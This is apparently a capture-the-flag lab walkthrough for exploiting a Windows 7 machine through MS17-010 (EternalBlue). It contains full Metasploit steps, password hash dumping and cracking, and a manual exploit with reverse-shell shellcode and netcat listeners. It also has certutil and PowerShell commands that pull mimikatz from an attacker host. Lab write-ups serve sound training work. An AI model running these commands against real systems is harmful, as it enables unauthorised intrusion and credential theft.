[Task 1] Recon
- Scan the machine.
nmap -Pn <ip>
nmap -A -T 5 <ip> -vv
It’s a windows 7 machine.
2. How many ports are open with a port number under 1000?
ANS: In #1
3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)
nmap --script vuln <ip> -vv
[Task 2] Gain Access
- Start Metasploit
msfconsole
2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
search ms17–010
Because the machine is windows 7. Let’s try “windows/smb/ms17_010_eternalblue”
use 23. Show options and set the one required value. What is the name of this value? (All caps for submission)
show options
set RHOSTS <target ip>
4. Run the exploit!
run
Success!!!
5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
Press enter
[Task 3] Escalate
- If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
Back to metasploit first
background
Verify sessions
sessions
use multi/manage/shell_to_meterpreter
2. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)
ANS: It’s in #1.
3. Set the required option, you may need to list all of the sessions to find your target here.
set LPORT 1234set SESSION 1
4. Run! If this doesn’t work, try completing the exploit from the previous task once more.
run
5. Once the meterpreter shell conversion completes, select that session for use.
Verify sessions
sessions
sessions 2
6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
getsystem
shell
whoami
Press “ctrl+z” to go back to meterpreter
7. List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
ps
8. Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
Migrate to lsass.exe
migrate 708
[Task 4] Cracking
Dump the non-default user’s password and crack it!
- Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
hashdump
2. Copy this password hash to a file and research how to crack it. What is the cracked password?
Copy to file, it’s NTLM hash.
Organize hash for cracking
I will use hashcat for cracking.
Reference: https://github.com/frizb/Hashcat-Cheatsheet
hashcat -a 0 -m 1000 hashforcrack.txt rockyou.txt --force --username --show____________________________________________________________________explaining
____________________________________________________________________“-a 0” mean attack mode 0
“-m 1000” mean NTLM hash
“--force” mean my machine is not a native Intel OpenCL runtime. Need to force it.
"--username" mean ignore username in file
"--show" mean show cracked password
[Task 5] Find flags!
1. Flag1? (Only submit the flag contents {CONTENTS})
Flag1 is located in C:\
cat flag1.txt
2. Flag2? *Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.
Flag2 is located in “C:\Windows\System32\config”.
cat flag2.txt
3. flag3?
Flag3 is located in “C:\Users\Jon\Documents”.
cat flag3.txt
[Final] Let’s try without metasploit
1.Shell
I use this script from https://github.com/3ndG4me/AutoBlue-MS17-010
git clone https://github.com/3ndG4me/AutoBlue-MS17-010cd AutoBlue-MS17-010
Check if target is vulnerable
python eternal_checker.py <target ip>
Create shellcode
cd shellcode./shell_prep.sh
Answer the question in shell_prep.sh
1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y2. LHOST : <attacker ip>3. LPORT x64 : 44444. LPORT x86 : 55555. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 16. Type 0 to generate a staged payload or 1 to generate a stageless payload : 0
Start listener
nc -lvp 4444nc -lvp 5555
Let’s exploit, from /shellcode back to /AutoBlue-MS17–010/shellcode
cd ..ls
I will use eternalblue_exploit7.py
python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin
Failed, no shell in my listener
Let’s run command again, still fail.
python eternalblue_exploit7.py <target ip> shellcode/sc_all.binLet’s create new shellcode, remove old one first
cd shellcoderm sc*ls
Create shellcode
./shell_prep.shAnswer the question in shell_prep.sh, this time I will use different ports and stageless payload
1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y2. LHOST : <attacker ip>3. LPORT x64 : 88884. LPORT x86 : 99995. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 16. Type 0 to generate a staged payload or 1 to generate a stageless payload : 1
Start listener
nc -lvp 8888nc -lvp 9999
Let’s run command again. This time I have to run the command twice until I have a shell.
python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin
At listener, I have a shell at port 8888.
Conclusion:
I think eternal blue exploit is somehow unstable. Sometimes I have to run the script 5 times until I have a reverse shell.
Just don’t give up, keep trying
2. Find flag
cd \dir flag* /s /b
3. Dump password
Download mimikatz: https://sourceforge.net/projects/mimikatz.mirror/
At mimikatz.exe folder, create HTTP Server
python -m SimpleHTTPServer 1234
At window shell, download mimikatz.exe
powershell -c "Invoke-WebRequest -OutFile mimikatz.exe http://<attacker ip>:<attacker port>/mimikatz.exe"Powershell failed!!!
No file is downloaded.
Stop shell and run exploit again, this time I will use certutil
certutil.exe -urlcache -f http://<attacker ip>:<attacker port>/mimikatz.exe mimikatz.exeSuccess!!!
dir
Run mimikatz.exe
mimikatz.exelsadump::sam
Crack hash with crackstation
Let’s RDP, open remmina
